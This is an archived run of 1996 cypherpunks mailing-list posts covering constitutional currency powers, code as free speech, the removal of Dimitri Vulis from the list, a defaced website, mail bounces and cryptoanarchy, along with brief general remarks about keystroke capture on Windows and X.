>> "ARTICLE 1, SECTION 8 OF THE CONSTITUTION STATES THAT CONGRESS SHALL HAVE
>> THE POWER TO COIN (CREATE) MONEY AND REGULATE THE VALUE THEREOF.

> The above is a true statement.  Note however that "congress" cannot
> operate the mint.  It must -- **MUST** -- delegate this duty to the
> executive branch (or someone outside the legislative branch, cf. Chadha
> v. U.S.) if it wants it done. Congress is free to select the type
> of agent it wants to do this.  Indeed, if Congress chose to license
> private mints, that would, IMHO be legal.  The point here is that the
> states don't have the power to coin money.

During the Free Banking Era, banks and companies issued their own
dollars.  I believe that at that time the dollar was defined in
terms of a certain weight of gold.

The value of any dollar you might be holding was related to the
level of confidence in the institution that issued it.  Books were
published which recorded the "exchange rate" between each kind of
dollar.

This is very similar to Congress licensing private mints.

Peter Hendrickson
ph@netcom.com






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@cypherpunks.ca (John Anonymous MacDonald)
Date: Tue, 12 Nov 1996 08:36:46 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: "Nightmare on Crypto Street--the Return of Sun Devil"
Message-ID: <199611121619.IAA00293@abraham.cs.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain


Peter Hendrickson wrote:

< snip >

... the more we can erode the barriers between code and language,
>the stronger the case is that laws governing code are violations of
>the First Amendment.  What if you had a compiler that accepted English
>language instructions for how to build a crypto system?  "Take a
>random number 64 bits long.  Then find a prime which is a little
>larger.  Then...."  The language itself should remain protected by the
>First Amendment even if somebody else has a compiler which can turn it
>into software.

Agreed, and this is happening (slowly). Some have said that "cypherpunks
spread crypto" is a better motto than just "cypherpunks write code," for
this reason and because it covers broader ground, although coding will
always be essential to any of the other cypherpunk efforts in the end.
Theres a lot of talent on this list, despite a few nuts mixed in.

>Another conclusion we can draw is that cryptoanarchy is more of a
>political issue than many of us would like.  That means we might put
>more effort into public opinion than just straight coding.  (Tim may
>claim otherwise, but I think he agrees with this in practice.)

Distasteful, but probably true.

>It may also be that the "bad boy" image of the Cypherpunks is
>counterproductive to our goals.

I'm not sure it's so bad, among the better educated anyway.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Vince Callaway <vince@web.wa.net>
Date: Tue, 12 Nov 1996 08:20:58 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Secrecy: My life as a nym. (Was: nym blown?)
In-Reply-To: <199611111626.IAA31552@crypt>
Message-ID: <Pine.LNX.3.93.961112081635.2801B-100000@web.wa.net>
MIME-Version: 1.0
Content-Type: text/plain


> 
> Are there other measures which parents could take while their children are
> young to get them off to a good start, privacy-wise?

Every couple of months I one of my kids brings home a form from school
asking everything from how many kids in the family, how much money do I
make, do we own our home and other things that have nothing to do with
educating my children.

At first I just pitched them, but then they started getting on my kids for
not returning them.  When they did that I went to the school and demanded
to see a background history and credit report on every school employee who
came in contact with my child.  They refused sighting privacy etc...  I
told them I had the same rights and to stop hasseling me with their little
forms.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ryan Russell/SYBASE <Ryan.Russell@sybase.com>
Date: Tue, 12 Nov 1996 08:33:52 -0800 (PST)
To: Ted Garrett <teddygee@visi.net>
Subject: Re: two bogus messages to this list
Message-ID: <9611121632.AA26619@notesgw2.sybase.com>
MIME-Version: 1.0
Content-Type: text/plain

All computers have software which capture keystrokes
in a central way....we call them "keyboard drivers."

Any machine you have physical access to can 
be compromised.

    Ryan

---------- Previous Message ----------
To: wombat
cc: attila, cypherpunks, ichudov
From: teddygee @ visi.net (Ted Garrett) @ smtp
Date: 11/11/96 11:08:59 PM
Subject: Re: two bogus messages to this list


On Mon, 11 Nov 1996, Rabid Wombat wrote:
>On Mon, 11 Nov 1996 attila@primenet.com wrote:
>
>> In <199611111238.GAA17346@manifold.algebra.com>, on 11/11/96 
>>    at 06:38 AM, ichudov@algebra.com (Igor Chudov @ home) said:
>> 
>> >.I did not write the two messages below. I did have a small party
>> >.yesterday, probably some of my guests did that...
>>         just goes to proof it:  Microslop and Intel boxes are secure
>>     only when most of their parts are stored under lock and key.
>
>Um, not to disagree with you re Intel/Micro$loth, but most UNIX systems 
>can be brought up in single-user mode and the root password changed by 
>anyone with physical access to the system. You could end up with even 
>more trouble than if someone messed with your M$ box.

Microsloth has, at the heart of it's system, a call which traps ALL
KEYSTROKES and EVENTS.  This call exists from Win32s on, and can be
placed inside of a DLL which most users would have no idea was loaded.
Even under NT, this DLL can be made to remain resident and trapping
Keystrokes, events, and window contents.

Does this just BEG to be exploited?

If you give me normal user access to ANY microsloth machine, I can
have most of the system's security broken down to NOTHING within a
week.  And I'm not even a good MS programmer!  <Are my prejudices
showing?>

At least under UNIX, you damned well know you have to secure your
system.  Microsloth attempts to sell itself as a secure platform.

---
"Obviously, the US Constitution isn't perfect, but
it's a lot better than what we have now." - Unknown
PGP key id - 0xDEACDFD1 - Full key available from
pgp-public-keys@pgp.mit.edu









-----BEGIN PGP SIGNATURE-----
Version: 2.6.3i

iQEVAwUBMof4ac1+l8EKBK5FAQHyHQf7BpV8GBB7EEazflFHoTjsUgBrayH9ibCb
IBYWUqiftuviG7TdKMg/Sj3eh69O9iMqah5lZR0bvpKZqFbeNgbMRGHnytjGvk5z
cmJUQaPgNYupZlLdg0bfbnaNyjJzUYTpNIuNX/fvwUwYQDKtXquTqcoMvWl0tFSI
N0PaiZEj5gsRbNCiJ15Uuzpwxn+FtYhwq92bWCWmSqLkpgn1FbC0PwzmKoEcrHpW
hYICm0LLS5Pp9y846SNEcANOP66/VfAL1pMsiBCL0tLxBa+K/UcB6xnutApQ4K0P
DeMkhqw3Z6fQVBAnJFGsrVJaXOvvtPdH1Lbwo1eIutbqyAaFU2FVGQ==
=dru/
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jbugden@smtplink.alis.ca
Date: Tue, 12 Nov 1996 05:48:00 -0800 (PST)
To: Dale Thorn <dthorn@gte.net>
Subject: RE: His and Her Anarchies
Message-ID: <9610128478.AA847817238@smtplink.alis.ca>
MIME-Version: 1.0
Content-Type: text/plain



jbugden@smtplink.alis.ca wrote:
>Most reasonable sophisticated men are happier in an environment that >included
women.
 
Dale Thorn <dthorn@gte.net> wrote:
>I think if people were really honest, they'd admit that, by and large,
>men like men and women like women.
 
Well, ignoring the narcissistic overtones of your comment, and the fact that I
was quoting David Gelernter from Yale, I could point out the qualifier
"reasonably sophisticated" or the relative comparator "happier", but I think it
will suffice to say that an environment that included women may just include
your mother.
 
And wouldn't we all be happier with our mommy around?
 
Ciao,
James
 
You can fool all of the people some of the time, and some of the people all of
the time, but you can't fool mom.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: camcc@abraxis.com (Alec)
Date: Tue, 12 Nov 1996 05:56:20 -0800 (PST)
To: Cypherpunks <cypherpunks@toad.com>
Subject: Georgia Internet Law
Message-ID: <2.2.32.19961112135622.0067bdf4@smtp1.abraxis.com>
MIME-Version: 1.0
Content-Type: text/plain


>X-Sender: rcostner@intergate.net
>Date: Tue, 12 Nov 1996 02:07:00 -0500
>Reply-To: Electronic Frontiers Ga Action Mailing List <ACTION@efga.org>
>From: "Robert A. Costner" <pooh@efga.org>
>Subject: Georgia Internet Law
>
>Here's some info on the HB1630 issue...
>
>>Return-Path: <jfaber@A.crl.com>
>>Date: Mon, 11 Nov 1996 19:32:13 -0800
>>From: Joe Faber <jfaber@A.crl.com>
>>Reply-To: joefaber@dwt.com
>>Organization: Davis Wright Tremaine

>>I have published an article on your case against the law in my firm's
>>First Amendment Law Letter, if you would like to link to it.  The
>>article can be found at
>>http://www.dwt.com/News/firstamendnews/regulation.html.
>>
>>Joe Faber

FYI--Internet law issues

Cordially,

Alec                   

PGP Fingerprint:

pub  1024/41207EE5 1996/04/08 Alec McCrackin <camcc@abraxis.com>
Key fingerprint =  09 13 E1 CB B3 0C 88 D9  D7 D4 10 F0 06 7D DF 31 
                             





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: C Matthew Curtin <cmcurtin@research.megasoft.com>
Date: Tue, 12 Nov 1996 06:09:45 -0800 (PST)
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: Getting attention the old-fashioned way
In-Reply-To: <v03007808aead2c1a14b4@[207.167.93.63]>
Message-ID: <199611121402.JAA02948@goffette.research.megasoft.com>
MIME-Version: 1.0
Content-Type: text/plain


>>>>> "Tim" == Timothy C May <tcmay@got.net> writes:

Tim> I sent him a note saying I would not give him such quotes.

I wonder if you're likely to have your refusal to give quotes quoted.

Tim> (methinks Vulis has a pretty strong latent
Tim> fixation, given his constant focus on certain topics and words).

Gee, I figured it was just a weak vocabulary.

Tim> Sad that journalists cater to this kind of thing. I guess
Tim> "personality pieces" are ever so much more popular than technical
Tim> pieces, or even careful explications of things like crypto
Tim> anarchy and the real implications of the tecnologies we are
Tim> involved with.

Sad, yes; surprising, no. It's been my experience that such things are
often dependant on the journalist's audience (i.e., is it a trade rag
like InfoWorld or the National Enquirier?) In any event, journalists
(and/or their publishers) aren't usually noted for doing things that
are interesting or important. Rather, they seem to have a preference
for writing and publishing what will sell. (Just as is the case with
TV talk shows, etc.)

What's worrysome is that the degenerates who concern themselves with
nonsense are numerous enough to make sufficient demand to keep the
mainstream press focused on such trivial matters, allowing more
significant things to go unreported outside of the small circles from
which they've originated.

It reminds me of something I saw on television while waiting for my
car to be serviced last week. A talk show was on (I think Jenny
Jones), and they brought on stage a woman who took her financially
troubled sister in. The man of the house (apparantly they were
unmarried, but had children together) ended up with the sister. During
the course of telling the story, they brought more and more of them
out, until they had all three people there in front of the
audience. Everyone on stage was yelling at each other, the audience
making judgemental comments to the people on the stage. I was
attempting to read, but the volume was so loud I couldn't help but be
distracted. A ridiculous commentary of the pathetic mentality of so
many people. (And some people actually wonder why my geek code
contains "!tv".)

-- 
Matt Curtin  cmcurtin@research.megasoft.com  Megasoft, Inc   Chief Scientist
http://www.research.megasoft.com/people/cmcurtin/   I speak only for myself.
Hacker Security Firewall Crypto PGP Privacy Unix Perl Java Internet Intranet




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "John L. Tocher" <jltocher@earthlink.net>
Date: Tue, 12 Nov 1996 09:08:20 -0800 (PST)
To: John Young <cypherpunks@toad.com
Subject: Re: ENT_ice
Message-ID: <3.0.32.19961112090752.006a9688@earthlink.net>
MIME-Version: 1.0
Content-Type: text/plain



John L. Tocher                THE CITY-a bounded infinity.   A labyrinth where
JLTocher@Earthlink.net        you are never lost. Your private map where every
PGP:  CE 72 1A 11 07 47 35    block bears exactly the same number. Even if you
35 9A C1 DE EA 64 21 BC 94    lose your way, you cannot go wrong.   --Abe Kobo




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Tue, 12 Nov 1996 06:39:29 -0800 (PST)
To: cypherpunks@toad.com
Subject: The persistance of reputation
In-Reply-To: <v03007800aea91c1473f2@[206.119.69.46]>
Message-ID: <v0300780caeae3069d6ec@[206.119.69.46]>
MIME-Version: 1.0
Content-Type: text/plain


At 8:02 pm -0500 11/11/96, Rich Graves wrote:
>> Given this, and, of course, our own fun and games with anonymous, er,
>> slander, on this list, I'm frequently tempted to agree with him.
>
>You people are wimps. The only real effect of the good doctor's rants
>has been, as Mr. May indicated, to get the good doctor on the "don't
>hire" list.

Sorry. I wasn't clear. My tongue was planted firmly in cheek there. I'm
"frequently tempted" in the same way I'm "frequently tempted" to rip
someone's head off and shit down their neck.

>You get off your ass and find out directly.
>
>How about if you know exactly who it is, but you know him to be
>judgement-proof, since he's already saddled with over $12 million in
>libel and wrongful-death suits? It's called "reputation capital."

See above. You're preaching to the choir here...

>People are just going to have to be smarter than they've ever been. The
>Net enables sharing and verifying real information just as it enables
>disinformation. Sure disinformation will always be cheaper to produce
>and more appealing to the eye (fact is harder to accept than fiction
>because fictional plots are written to make sense), but disinformation
>tends to cancel itself out.

I agree, but, I think that, in the long run, disinformation may cost more.
Lying always involves more work, and thus cost, than telling the truth. In
order to support a lie you have to keep weaving a coherent tissue of other
lies around the original lie to support it, all of which makes the original
lie more and more non-plausible. In other words, the more "resolution" you
get on a lie, the more it looks like a lie. Maybe that's the "cancel itself
out" you're talking about. Of course, that implies critical thinking on the
part of the listener, or at least access to critical information, which is
what the net provides at a cheap price, like you said. So, maybe what we're
saying here is that disinformation costs more than information, but if
disinformer has more money, or at least communication resources, it'll be
believed. On a geodesic network, this is much harder, because centralized
nodes choke on their information load, and can't spread lies as cheaply as
they can on a hierarchically controlled communication network, like
broadcast, or even print, media.

>Work on archives, reputation control, and openness. Disinformation, to
>be truly effective, requires a monopoly on information. More speech, not
>less.

Right.

>(Keep in reserve the retort that anonymity is quite big in "the
>mainstream," too. How many key stories cite "well-placed
>administration sources"?)
>
>The opposite of the Black Unicorn approach to nym safety is the Liz
>Taylor approach: "As long as they spell my name right, I don't care."
>Nobody I care about is going to listen to some crank, or if they do,
>they'll email me to check the facts, or if they don't, I have
>alternative outlets for information. As long as I live in a free country
>with a free Internet, they can't touch me.

Say 'amen' somebody. Reputation is reputation, nym or not. However, nyms
allow something very important. Since the net enables reputation to persist
(functionally) forever, nyms allow you to "start over", much in the same
way that geographic frontiers have functioned historically.

The paradox of ubiquitous network computing is it takes away privacy by
creating persistant information accessable to anyone, while at the same
time creating perfect pseudonymity and thus new reputation.

Cheers,
Bob Hettinga


-----------------
Robert Hettinga (rah@shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA
"The cost of anything is the foregone alternative" -- Walter Johnson
The e$ Home Page: http://www.vmeng.com/rah/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Tue, 12 Nov 1996 06:25:20 -0800 (PST)
To: cypherpunks@toad.com
Subject: Enabling Electronic Commerce
Message-ID: <1.5.4.32.19961112142327.006973b0@pop.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


Would anyone know of a source for the "Enabling Electronic
Commerce" paper listed below? The hyperlink gave a 404 but
identified the document as "iiicecom.htm."

----------

http://www.x3.org/itic/961031.htm  [Excerpt]


World's Leading IT Industry Associations Reach Accord On
Global Information Society Policy Issues


October 31, 1996, Napa, California- The world's leading information 
technology industry associations completed work today on policy 
recommendations to stimulate the realization of a Global Information 
Society. 

These recommendations, or common views papers, were adopted 
by the group at the conclusion of this week's International 
Information Industry Congress (IIIC) in Napa Valley, California. 
They cover the following issues: 

Enabling Electronic Commerce -- discusses the requirements for 
successful international electronic commerce:

     cryptography policy; 
     acceptance of electronic proofs; 
     digital signatures; 
     and electronic contracts and receipts. 

[Snip balance of document]





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Declan McCullagh <declan@well.com>
Date: Tue, 12 Nov 1996 09:33:47 -0800 (PST)
To: cypherpunks@toad.com
Subject: Censorship on cypherpunks?, from The Netly News
Message-ID: <Pine.GSO.3.95.961112093119.7009B-100000@well.com>
MIME-Version: 1.0
Content-Type: text/plain


The Netly News
http://www.netlynews.com/
November 11, 1996

Cypher-Censored
By Declan McCullagh (declan@well.com)
                                       
       The cypherpunks mailing list, so legend goes, coalesced around two
   principles: the dissemination of strong encryption and an absolute
   commitment to free speech. It was a kind of crypto-anarchist utopia:
   Here was a place where anonymity was encouraged and PGP-signed
   postings were the norm -- and nobody seemed to be in control.
   
       That is, until recently, when Dimitri Vulis was given the boot.
   After he refused to stop posting flames, rants and uninspired personal
   attacks, Vulis was summarily removed from the mailing list.
   
       Now, normally, when someone gets evicted from a mailing list, it
   excites little attention. But here was an ironic -- some would say
   momentous -- event: The list is run, after all, by John Gilmore, the
   EFF cofounder, a cypherpunk god who is famous for having once said
   that the Internet interprets censorship as damage and routes around
   it. And it was none other than Gilmore who gave Vulis the boot. The
   shunning of Vulis was "an act of leadership," Gilmore said.
   
       Thus began a debate over what the concept of censorship means in a
   forum devoted to opposing it. Did Gilmore have the right to show Vulis
   the virtual door? Or should he have let the ad hominem attacks
   continue, encouraging people to set their filters accordingly? The
   incident raises deeper questions about how a virtual community can
   prevent one person from ruining the forum for all and whether only
   government controls on expression can be called "censorship."
   
        Vulis, a 31-year old Russian emigre who completed a PhD in
   mathematics last year at the City University of New York, is described
   as sociable, even friendly, by people who have met him. Online,
   though, he's almost notorious. His .sig file, for instance, proudly
   points out that he's a former Kook of the Month; Vulis was also a
   Net-legend and even has the alt.fan.dimitri-vulis newsgroup named
   after him.
   
       Vulis portrays himself as a victim, but as I posted to the list
   last week, I disagree. Anyone who's spent any time on the
   100-plus-messages-a-day list can read for themselves the kind of nasty
   daily messages that came from Vulis's keyboard. The list is on
   Gilmore's machine and he can do what he wants with it; he can moderate
   the postings, he can censor material, he can shut the whole thing
   down. By kicking off an offending user, a list owner merely exercises
   his property right. There's no government involvement, so the First
   Amendment doesn't apply. And the deleted, disgruntled user is free to
   start his own mailing list with different rules.
   
       But then the question is whether Gilmore should have exercised
   that right, especially in such an open forum. Again, I think Gilmore's
   actions were justified. Consider inviting someone into your home or
   private club. If your guest is a boor, you might ask him to leave. If
   your guest is an slobbish drunk of a boor, you have a responsibility
   to require him to leave before he ruins the evening of others.
   
       Eugene Volokh, a law professor at UCLA, runs a number of mailing
   lists and has kicked people off to maintain better editorial control.
   Volokh says that the most valuable publications are those that
   exercise the highest degree of editorial control.
   
       But what if your private club's express purpose is to cherish free
   speech? That's where the terrain gets mucky. One 'punk wrote: "For
   someone who espouses freedom of speech to arbitrarily censor someone
   is indeed hypocritical." Another called it a "big cypherpunkish move"
   that couldn't be condoned "even bearing in mind the inane and
   wearisome behaviour of Dr. Vulis." Still others said that this
   demonstrated that "libertarianism can't work without some measure of
   authoritarianism." (Libertarianism being the primordial flame war
   topic, the debate nearly consumed itself at this point.)
   
       Vulis told me yesterday: "I'm particularly disappointed by John
   Gilmore's actions. I've known him and communicated with him before.
   His treatment of me was rude and unprofessional and inappropriate." In
   posts to the mailing list, Vulis levels the additional criticism that
   it was "arbitrary and capricious" and that he was not notified that he
   would be forcibly unsubscribed.
   
       This week Vulis busied himself by saying that now Gilmore can be
   sued for what happens on cypherpunks, arguing that the list owner is
   exercising greater control and so is subject to greater liability. Of
   course, in this country anyone can sue for anything. But it's highly
   unlikely the suit would go anywhere. Solveig Bernstein, a lawyer with
   the Cato Institute, says: "Chances are in a defamation lawsuit he'd be
   treated like a publisher or bookstore owner.. They exercise some
   control over content and enjoy pretty broad immunity from lawsuits."
   
       For his part, Gilmore calls removing the Russian mathematician "an
   act of leadership." He says: "It said we've all been putting up with
   this guy and it's time to stop. You're not welcome here... It seemed
   to me that a lot of the posts on cypherpunks were missing the mark.
   They seemed to have an idea that their ability to speak through my
   machine was guaranteed by the Constitution."
   
       What does Vulis's ouster mean to the community that sprang up
   around this mailing list, of which he had been a member for nearly
   three years? Many of his peers think he did it for attention or
   notoriety; one longtime list-denizen declined to be interviewed for
   fear of encouraging him. (If that's his goal, he's already succeeded.
   Will Rodger from Inter@ctive Week and Lewis Koch from Upside Magazine
   are writing about this.)
   
       Other cypherpunks wonder why Vulis is abrasive online, yet
   mild-mannered in person; Gilmore likened him to "a Jekyll-and-Hyde
   personality."
   
       The flap comes at a time when other prominent cypherpunks are
   leaving, citing too many flames and too little content. Perry Metzger,
   another longtime member, announced last month he would start his own,
   moderated mailing list. The hard-core programmers have moved on. Yet
   the list membership has never been higher, at 1,949 direct
   subscribers. And the cyber-rights issues the group discusses have
   never been more important.
   
       Ironically, tools like anonymous remailers that the cypherpunks
   labored to create now make it impossible to get rid of Vulis
   completely. Blocking posts from remailers is unthinkable to the
   cypherpunks. So the embattled Russian émigré continues to read the
   list under a pseudonym and appears to be posting as frequently as
   ever. But perhaps Gilmore succeeded in part. If not more polite,
   Vulis's messages now are at least on-topic.
   
###





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mark M. Lacey" <mml@halcyon.com>
Date: Tue, 12 Nov 1996 10:12:12 -0800 (PST)
To: Rabid Wombat <teddygee@visi.net>
Subject: RE: two bogus messages to this list
Message-ID: <01BBD081.63E4D3C0@blv-pm101-ip1.halcyon.com>
MIME-Version: 1.0
Content-Type: text/plain


>Um, not to disagree with you re Intel/Micro$loth, but most UNIX systems 
>can be brought up in single-user mode and the root password changed by 
>anyone with physical access to the system. You could end up with even 
>more trouble than if someone messed with your M$ box.

Microsloth has, at the heart of it's system, a call which traps ALL
KEYSTROKES and EVENTS.  This call exists from Win32s on, and can be
placed inside of a DLL which most users would have no idea was loaded.
Even under NT, this DLL can be made to remain resident and trapping
Keystrokes, events, and window contents.

This is (or was?) no problem under X Windows the last time I tried it (not recently), too.  In fact, you could monitor the keystrokes of any machine that you had access to remotely, as long as X was running.  All it took was a short little C program.  So what call is it on NT that you're talking about?

Mark M. Lacey <mml@halcyon.com>
"Speaking for nobody but myself."
[Finger mml@halcyon.com for my PGP public key.]
[If you don't have 'finger', e-mail me for it.]





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dvv@sprint.net (Dima Volodin)
Date: Tue, 12 Nov 1996 07:21:21 -0800 (PST)
To: security@myinternet.net (Eraser)
Subject: Re: Kriegsman Furs Website hacked...
In-Reply-To: <199611121358.AAA13883@myinternet.net>
Message-ID: <199611121520.KAA05655@mercury.int.sprintlink.net>
MIME-Version: 1.0
Content-Type: text/plain


Moron. A crack is a crack is a crack - disgusting as it is. And the
hypocrisy about the hard life of sysadmin is absolutely disgusting.  No
matter whether it is for furry creatures, centipedal creatures or for
defenceless baby carrots.


Dima

Eraser writes:
> 
> Hey all..
> 
> Another commercial hack.
> 
> http://www.kriegsman.com/ which is still live at this posting.
> 
> if it goes down, or is fixed, a mirror exists on
> http://www.skeeve.net/kriegsman/
> 
> nicely done...
> 
> one for the furry creatures.
> 
>  -------------------------------------------------------------------
> | Skeeve Stevens - MyInternet  personal.url: http://www.skeeve.net/ |
> | email://skeeve@skeeve.net/   work.url: http://www.myinternet.net/ |
> | phone://612.9869.3334/       mobile://0414.SKEEVE/      [753-383] |
>  -------------------------------------------------------------------
> 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Edouard Janssens <ej@netit.be>
Date: Tue, 12 Nov 1996 01:32:39 -0800 (PST)
To: cypherpunks@toad.com
Subject: unsubcribe
Message-ID: <v03007801aeade6d1ec11@[193.74.109.21]>
MIME-Version: 1.0
Content-Type: text/plain


unsubcribe

--------------------------------------------
Edouard Janssens                 ej@netit.be
Net it be s.a.                  www.netit.be
Rue Tenbosch, 94
B-1050 Brussels        tel. +32 2 343 93 35
Belgium                fax. +32 2 343 04 05

 "There will be an answer, ... Net it be !"
--------------------------------------------






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Tue, 12 Nov 1996 10:41:20 -0800 (PST)
To: "Michael Froomkin - U.Miami School of Law" <dougr@skypoint-gw.globelle.com>
Subject: Re: Not. [Was Re: Federal Reserve Bank is ILLEGAL?]
Message-ID: <199611121840.KAA04414@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 11:57 PM 11/11/96 -0500, Michael Froomkin - U.Miami School of Law wrote:
>On Tue, 12 Nov 1996, Doug Renner wrote:
>
>> article nearly head-on.  However is it true that what you are saying is 
>> that two fundamental premises in the article you refer to as "rabid" are 
>> incorrect?  Namely:
>> 
>> "ARTICLE 1, SECTION 8 OF THE CONSTITUTION STATES THAT CONGRESS SHALL HAVE
>> THE POWER TO COIN (CREATE) MONEY AND REGULATE THE VALUE THEREOF.
>
>The above is a true statement.  Note however that "congress" cannot
>operate the mint.  It must -- **MUST** -- delegate this duty to the
>executive branch (or someone outside the legislative branch, cf. Chadha
>v. U.S.) if it wants it done. Congress is free to select the type
>of agent it wants to do this.  Indeed, if Congress chose to license
>private mints, that would, IMHO be legal.  The point here is that the
>states don't have the power to coin money.

But, apparently, during the 1800's states (?) and individual banks did 
indeed print their own currency.

The way I see it, a positive statement in the Constitution that the Feds 
have the power to coin money does not necessarily exclude other 
people/banks/states/foreign countries from doing likewise.


Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Fricker <jfricker@vertexgroup.com>
Date: Tue, 12 Nov 1996 10:49:30 -0800 (PST)
To: cypherpunks@toad.com
Subject: BizWeek speaks on Crypto
Message-ID: <19961112184849116.AAA174@dev.vertexgroup.com>
MIME-Version: 1.0
Content-Type: text/plain


http://www.businessweek.com/1996/47/b350287.htm


--j
-----------------------------------
| John Fricker (jfricker@vertexgroup.com)
| -random notes-
| My PGP public key is available by sending mail with subject "send pgp key".
| www.Program.com is a good programmer web site.
-----------------------------------





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: camcc@abraxis.com (Alec)
Date: Tue, 12 Nov 1996 07:53:50 -0800 (PST)
To: Cypherpunks <cypherpunks@toad.com>
Subject: What is: Returned mail: User Unknown
Message-ID: <2.2.32.19961112155353.00686588@smtp1.abraxis.com>
MIME-Version: 1.0
Content-Type: text/plain


>Date: Tue, 12 Nov 1996 18:17:40 +1100
>To: mianigand@outlook.net, cypherpunks@toad.com
>To: owner-cypherpunks@toad.com
>To: cypherpunks-errors@toad.com
>References: <199611111831.KAA10148@toad.com>
>X-Loop: postmaster@opennet.net.au
>Subject: Returned mail: User Unknown
>From: Open Net Postmaster <postmaster@opennet.net.au>
>Sender: owner-cypherpunks@toad.com
>
>
>The address you mailed to is no longer valid.
>This is probably because the user in question was an
>old Open Net subscriber. Open Net is NO LONGER an ISP,
>and has not been since May 1996.
>
>We have no redirection address for that user. Please
>remove them from any mailing lists you might have.
>
>This response was generated automatically.

I have received about 20 of these messages. Anyone else with this problem?

 
Cordially,

Alec                   

PGP Fingerprint:

pub  1024/41207EE5 1996/04/08 Alec McCrackin <camcc@abraxis.com>
Key fingerprint =  09 13 E1 CB B3 0C 88 D9  D7 D4 10 F0 06 7D DF 31 
                             





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Juriaan Massenza <juriaan_massenza@ctp.com>
Date: Tue, 12 Nov 1996 02:02:06 -0800 (PST)
To: "'Open Net Postmaster'" <postmaster@opennet.net.au>
Subject: RE: Returned mail: User Unknown
Message-ID: <c=GB%a=_%p=CTP%l=TRABANT-961112100054Z-204@trabant_temp.nl.ctp.com>
MIME-Version: 1.0
Content-Type: text/plain


I love bots...

>----------
>From: 	Open Net Postmaster[SMTP:postmaster@opennet.net.au]
>Sent: 	Tuesday, November 12, 1996 7:13 AM
>To: 	cypherpunks@toad.com; owner-cypherpunks@toad.com;
>cypherpunks-errors@toad.com
>Subject: 	Returned mail: User Unknown
>
>
>The address you mailed to is no longer valid.
>This is probably because the user in question was an
>old Open Net subscriber. Open Net is NO LONGER an ISP,
>and has not been since May 1996.
>
>We have no redirection address for that user. Please
>remove them from any mailing lists you might have.
>
>This response was generated automatically.
>
>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ted Anderson <ota+@transarc.com>
Date: Tue, 12 Nov 1996 08:15:15 -0800 (PST)
To: "Vladimir Z. Nuri" <vznuri@netcom.com>
Subject: Re: Black markets vs. cryptoanarchy
In-Reply-To: <199611101939.LAA13170@netcom4.netcom.com>
Message-ID: <wmW_81eSMV0=1A_040@transarc.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

"Vladimir Z. Nuri" <vznuri@netcom.com> writes:
> it seems to me the main proponents of "cryptoanarchy" tend to suggest
> a government structure is a completely useless construction. perhaps
> so but they would end up erecting othre systems to deal with the
> void they might not call "govt" but would have most of the features
> of one, imho. something "govtlike" is a measure of a civilized society,
> imho, hence my distaste in cryptoanarchy with its seeming naivete
> on the legitimate and crucial role of govt in a society. the specifics
> may vary between implementations, but imho in general something
> "govtlike" is crucial to civilized society.

This concluding paragraph got me to thinking of something I read
recently in "Bionomics" [1] about the public education problem.  The
point being made there is that injecting even a little real competition
into a monopoly situation improves things tremendously.  It is the
counter argument to the objection that allowing students choice of
schools will destroy the majority, as the "good" kids flee.  What will
happen instead is that most schools, seeing imminient flight, will take
measures to avoid losing students (and taking their tuition with them).
A few, that really can't adapt in time, fail and their students are
forced to seek other schools.  The result is that all schools, even
"public" schools improve dramatically.

It seems to me that the government as a whole may be subject to this
same force.  If cryptoanarchy can inject even a little real competition
into the business of government (in the "providing services crucial to a
civilized society" sense) it may succeed, even if few people actually
use bona fide cryptoanarchical tools.  If this is true, we can expect
existing government organizations to try to improve to avoid extinction
(some will doubtless try other things besides improvement).  Perhaps the
US Postal Service is a leading indicator of this process.  This suggests
that the transition to cryptoanarchy may be rather gradual and peaceful
after all.

Ted Anderson

I'm still behind on cypherpunks, so apologies if this response is dated.

[1] http://www.bionomics.org/text/resource/biobook.html

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMoihwwGojC9e/wyBAQHcJAQAoFO3a/kNxlp30A1CUTxKNoLgKPtATTp/
jYpqpeq29oh4195OvIIUVzx8DUyZgmdVJEtfPakatDuXsVPMwab18BriI7AJeq0u
1w43jimazlKCbbKFT9ZanzpJlohVxvsNlL132o7jq/4SHDnS0py3tIr/4HY0nUoL
dKh0avqHGeo=
=TIIL
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Arachelian <sunder@brainlink.com>
Date: Tue, 12 Nov 1996 08:10:55 -0800 (PST)
To: Juriaan Massenza <juriaan_massenza@ctp.com>
Subject: RE: Returned mail: User Unknown
In-Reply-To: <c=GB%a=_%p=CTP%l=TRABANT-961112100054Z-204@trabant_temp.nl.ctp.com>
